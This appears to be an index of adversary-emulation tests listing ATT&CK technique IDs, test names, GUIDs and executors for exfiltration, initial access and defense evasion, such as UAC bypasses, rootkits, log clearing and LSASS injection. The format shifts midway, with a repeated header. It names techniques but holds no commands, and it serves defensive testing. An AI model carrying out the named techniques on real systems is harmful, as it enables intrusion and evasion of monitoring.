initial-access,T1078.003,Valid Accounts: Local Accounts,9,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,10,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,3,Rundll32 execute VBscript command using Ordinal number,32d1cf1b-cbc2-4c09-8d05-07ec5c83a821,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,4,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,5,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,6,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,7,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,8,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,9,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,10,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,11,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,12,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
defense-evasion,T1218.011,Signed Binary Proxy Execution: Rundll32,13,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,4,chmod - Change file or folder mode (symbolic mode) recursively,0451125c-b5f6-488f-993b-5a32b09f7d8f,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,5,chown - Change file or folder ownership and group,d169e71b-85f9-44ec-8343-27093ff3dfc0,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,6,chown - Change file or folder ownership and group recursively,b78598be-ff39-448f-a463-adbf2a5b7848,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,10,Chmod through c script,973631cf-6680-4ffa-a053-045e1b6b67ab,sh
defense-evasion,T1222.002,File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification,11,Chown through c script,18592ba1-5f88-4e3c-abc8-ab1c6042e389,sh
defense-evasion,T1216.001,Signed Script Proxy Execution: Pubprn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1006,Direct Volume Access,1,Read volume boot sector via DOS device path (PowerShell),88f6327e-51ec-4bbf-b2e8-3fea534eab8b,powershell
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1014,Rootkit,3,dynamic-linker based rootkit (libprocesshider),1338bf0c-fd0c-48c0-9e65-329f18e2c0d3,sh
defense-evasion,T1014,Rootkit,4,Loadable Kernel Module based Rootkit (Diamorphine),0b996469-48c6-46e2-8155-a17f8b6c2247,sh
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,9,Bypass UAC using SilentCleanup task,28104f8a-4ff1-4582-bcf6-699dce156608,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,10,UACME Bypass Method 23,8ceab7a2-563a-47d2-b5ba-0995211128d7,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,11,UACME Bypass Method 31,b0f76240-9f33-4d34-90e8-3a7d501beb15,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,12,UACME Bypass Method 33,e514bb03-f71c-4b22-9092-9f961ec6fb03,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,13,UACME Bypass Method 34,695b2dac-423e-448e-b6ef-5b88e93011d6,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,14,UACME Bypass Method 39,56163687-081f-47da-bb9c-7b231c5585cf,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,22,Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key,251c5936-569f-42f4-9ac2-87a173b9e9b8,powershell
defense-evasion,T1548.002,Abuse Elevation Control Mechanism: Bypass User Account Control,23,UAC Bypass with WSReset Registry Modification,3b96673f-9c92-40f1-8a3e-ca060846f8d9,powershell
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh
defense-evasion,T1036.005,Masquerading: Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
defense-evasion,T1564,Hide Artifacts,4,Create and Hide a Service with sc.exe,333c7de0-6fbe-42aa-ac2b-c7e40b18246a,command_prompt
defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1497.001,Virtualization/Sandbox Evasion: System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
73 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 1 rm -rf 989cc1b1-3642-4260-a809-54f9dd559683 sh
74 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 2 Delete log files using built-in log utility 653d39cd-bae7-499a-898c-9fb96b8b5cd1 sh
75 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 3 Truncate system log files via truncate utility 6290f8a8-8ee9-4661-b9cf-390031bf6973 sh
76 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 4 Delete log files via cat utility by appending /dev/null or /dev/zero c23bdb88-928d-493e-b46d-df2906a50941 sh
77 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 5 System log file deletion via find utility bc8eeb4a-cc3e-45ec-aa6e-41e973da2558 sh
78 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 6 Overwrite macOS system log via echo utility 0208ea60-98f1-4e8c-8052-930dce8f742c sh
79 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 7 Real-time system log clearance/deletion 848e43b3-4c0a-4e4c-b4c9-d1e8cea9651c sh
80 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 8 Delete system log files via unlink utility 03013b4b-01db-437d-909b-1fdaa5010ee8 sh
81 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 9 Delete system log files using shred utility 86f0e4d5-3ca7-45fb-829d-4eda32b232bb sh
82 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 10 Delete system log files using srm utility b0768a5e-0f32-4e75-ae5b-d036edcf96b6 sh
83 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 11 Delete system log files using OSAScript 810a465f-cd4f-47bc-b43e-d2de3b033ecc sh
84 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 12 Delete system log files using Applescript e62f8694-cbc7-468f-862c-b10cd07e1757 sh
85 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 13 Delete system journal logs via rm and journalctl utilities ca50dd85-81ff-48ca-92e1-61f119cb1dcf sh
86 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 14 Overwrite Linux Mail Spool 1602ff76-ed7f-4c94-b550-2f727b4782d4 bash
87 defense-evasion T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs 15 Overwrite Linux Log d304b2dc-90b4-4465-a650-16ddd503f7b5 bash
88 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 1 CheckIfInstallable method call ffd9c807-d402-47d2-879d-f915cf2a3a94 powershell
89 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 2 InstallHelper method call d43a5bde-ae28-4c55-a850-3f4c80573503 powershell
90 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 3 InstallUtil class constructor method call 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 powershell
91 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 4 InstallUtil Install method call 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b powershell
92 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 5 InstallUtil Uninstall method call - /U variant 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b powershell
93 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 6 InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant 06d9deba-f732-48a8-af8e-bdd6e4d98c1d powershell
94 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 7 InstallUtil HelpText method call 5a683850-1145-4326-a0e5-e91ced3c6022 powershell
95 defense-evasion T1218.004 Signed Binary Proxy Execution: InstallUtil 8 InstallUtil evasive invocation 559e6d06-bb42-4307-bff7-3b95a8254bad powershell
96 defense-evasion T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
97 defense-evasion T1553.001 Subvert Trust Controls: Gatekeeper Bypass 1 Gatekeeper Bypass fb3d46c6-9480-4803-8d7d-ce676e1f1a9b sh
98 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 Take ownership using takeown utility 98d34bb4-6e75-42ad-9c41-1dae7dc6a001 command_prompt
99 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 2 cacls - Grant permission to specified user or group recursively a8206bcc-f282-40a9-a389-05d9c0263485 command_prompt
100 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 3 attrib - Remove read-only attribute bec1e95c-83aa-492e-ab77-60c71bbd21b0 command_prompt
101 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 4 attrib - hide file 32b979da-7b68-42c9-9a99-0e39900fc36c command_prompt
102 defense-evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification 5 Grant Full Access to folder for Everyone - Ryuk Ransomware Style ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 command_prompt
103 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 1 Msiexec.exe - Execute Local MSI file with embedded JScript a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04 command_prompt
104 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 2 Msiexec.exe - Execute Local MSI file with embedded VBScript 8d73c7b0-c2b1-4ac1-881a-4aa644f76064 command_prompt
105 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 3 Msiexec.exe - Execute Local MSI file with an embedded DLL 628fa796-76c5-44c3-93aa-b9d8214fd568 command_prompt
106 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 4 Msiexec.exe - Execute Local MSI file with an embedded EXE ed3fa08a-ca18-4009-973e-03d13014d0e8 command_prompt
107 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 5 WMI Win32_Product Class - Execute Local MSI file with embedded JScript 882082f0-27c6-4eec-a43c-9aa80bccdb30 powershell
108 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 6 WMI Win32_Product Class - Execute Local MSI file with embedded VBScript cf470d9a-58e7-43e5-b0d2-805dffc05576 powershell
109 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 7 WMI Win32_Product Class - Execute Local MSI file with an embedded DLL 32eb3861-30da-4993-897a-42737152f5f8 powershell
110 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 8 WMI Win32_Product Class - Execute Local MSI file with an embedded EXE 55080eb0-49ae-4f55-a440-4167b7974f79 powershell
111 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 9 Msiexec.exe - Execute the DllRegisterServer function of a DLL 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d command_prompt
112 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 10 Msiexec.exe - Execute the DllUnregisterServer function of a DLL ab09ec85-4955-4f9c-b8e0-6851baf4d47f command_prompt
113 defense-evasion T1218.007 Signed Binary Proxy Execution: Msiexec 11 Msiexec.exe - Execute Remote MSI file 44a4bedf-ffe3-452e-bee4-6925ab125662 command_prompt
114 defense-evasion T1556.002 Modify Authentication Process: Password Filter DLL 1 Install and Register Password Filter DLL a7961770-beb5-4134-9674-83d7e1fa865c powershell
115 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 1 Clear Bash history (rm) a934276e-2be5-4a36-93fd-98adbb5bd4fc sh
116 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 2 Clear Bash history (echo) cbf506a5-dd78-43e5-be7e-a46b7c7a0a11 sh
117 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 3 Clear Bash history (cat dev/null) b1251c35-dcd3-4ea1-86da-36d27b54f31f sh
118 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 4 Clear Bash history (ln dev/null) 23d348f3-cc5c-4ba9-bd0a-ae09069f0914 sh
119 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 5 Clear Bash history (truncate) 47966a1d-df4f-4078-af65-db6d9aa20739 sh
120 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 6 Clear history of a bunch of shells 7e6721df-5f08-4370-9255-f06d8a77af4c sh
121 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 7 Clear and Disable Bash History Logging 784e4011-bd1a-4ecd-a63a-8feb278512e6 sh
122 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 8 Use Space Before Command to Avoid Logging to History 53b03a54-4529-4992-852d-a00b4b7215a6 sh
123 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 9 Disable Bash History Logging with SSH -T 5f8abd62-f615-43c5-b6be-f780f25790a1 sh
124 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 10 Prevent Powershell History Logging 2f898b81-3e97-4abb-bc3f-a95138988370 powershell
125 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 11 Clear Powershell History by Deleting History File da75ae8d-26d6-4483-b0fe-700e4df4f037 powershell
126 defense-evasion T1070.003 Indicator Removal on Host: Clear Command History 12 Set Custom AddToHistoryHandler to Avoid History File Logging 1d0d9aa6-6111-4f89-927b-53e8afae7f94 powershell
127 defense-evasion T1202 Indirect Command Execution 1 Indirect Command Execution - pcalua.exe cecfea7a-5f03-4cdd-8bc8-6f7c22862440 command_prompt
128 defense-evasion T1202 Indirect Command Execution 2 Indirect Command Execution - forfiles.exe 8b34a448-40d9-4fc3-a8c8-4bb286faf7dc command_prompt
129 defense-evasion T1202 Indirect Command Execution 3 Indirect Command Execution - conhost.exe cf3391e0-b482-4b02-87fc-ca8362269b29 command_prompt
130 defense-evasion T1140 Deobfuscate/Decode Files or Information 1 Deobfuscate/Decode Files Or Information dc6fe391-69e6-4506-bd06-ea5eeb4082f8 command_prompt
131 defense-evasion T1140 Deobfuscate/Decode Files or Information 2 Certutil Rename and Decode 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 command_prompt
132 defense-evasion T1140 Deobfuscate/Decode Files or Information 3 Base64 decoding with Python 356dc0e8-684f-4428-bb94-9313998ad608 sh
133 defense-evasion T1140 Deobfuscate/Decode Files or Information 4 Base64 decoding with Perl 6604d964-b9f6-4d4b-8ce8-499829a14d0a sh
134 defense-evasion T1140 Deobfuscate/Decode Files or Information 5 Base64 decoding with shell utilities b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e sh
135 defense-evasion T1140 Deobfuscate/Decode Files or Information 6 Hex decoding with shell utilities 005943f9-8dd5-4349-8b46-0313c0a9f973 sh
136 defense-evasion T1140 Deobfuscate/Decode Files or Information 7 Linux Base64 Encoded Shebang in CLI 3a15c372-67c1-4430-ac8e-ec06d641ce4d sh
137 defense-evasion T1140 Deobfuscate/Decode Files or Information 8 XOR decoding and command execution using Python c3b65cd5-ee51-4e98-b6a3-6cbdec138efc bash
138 defense-evasion T1562 Impair Defenses 1 Windows Disable LSA Protection 40075d5f-3a70-4c66-9125-f72bee87247d command_prompt
139 defense-evasion T1562 Impair Defenses 2 Disable journal logging via systemctl utility c3a377f9-1203-4454-aa35-9d391d34768f sh
140 defense-evasion T1562 Impair Defenses 3 Disable journal logging via sed utility 12e5551c-8d5c-408e-b3e4-63f53b03379f sh
141 defense-evasion T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
142 defense-evasion T1036 Masquerading 1 System File Copied to Unusual Location 51005ac7-52e2-45e0-bdab-d17c6d4916cd powershell
143 defense-evasion T1036 Masquerading 2 Malware Masquerading and Execution from Zip File 4449c89b-ec82-43a4-89c1-91e2f1abeecc powershell
144 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 1 Copy and Delete Mailbox Data on Windows d29f01ea-ac72-4efc-8a15-bea64b77fabf powershell
145 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 2 Copy and Delete Mailbox Data on Linux 25e2be0e-96f7-4417-bd16-a4a2500e3802 bash
146 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 3 Copy and Delete Mailbox Data on macOS 3824130e-a6e4-4528-8091-3a52eeb540f6 bash
147 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 4 Copy and Modify Mailbox Data on Windows edddff85-fee0-499d-9501-7d4d2892e79b powershell
148 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 5 Copy and Modify Mailbox Data on Linux 6d99f93c-da56-49e3-b195-163090ace4f6 bash
149 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 6 Copy and Modify Mailbox Data on macOS 8a0b1579-5a36-483a-9cde-0236983e1665 bash
150 defense-evasion T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
151 defense-evasion T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
152 defense-evasion T1055 Process Injection 3 Section View Injection c6952f41-6cf0-450a-b352-2ca8dae7c178 powershell
153 defense-evasion T1218 Signed Binary Proxy Execution 1 mavinject - Inject DLL into running process c426dacf-575d-4937-8611-a148a86a5e61 command_prompt
154 defense-evasion T1218 Signed Binary Proxy Execution 2 Register-CimProvider - Execute evil dll ad2c17ed-f626-4061-b21e-b9804a6f3655 command_prompt
155 defense-evasion T1218 Signed Binary Proxy Execution 3 InfDefaultInstall.exe .inf Execution 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef command_prompt
156 defense-evasion T1218 Signed Binary Proxy Execution 4 ProtocolHandler.exe Downloaded a Suspicious File db020456-125b-4c8b-a4a7-487df8afb5a2 command_prompt
157 defense-evasion T1218 Signed Binary Proxy Execution 5 Microsoft.Workflow.Compiler.exe Payload Execution 7cbb0f26-a4c1-4f77-b180-a009aa05637e powershell
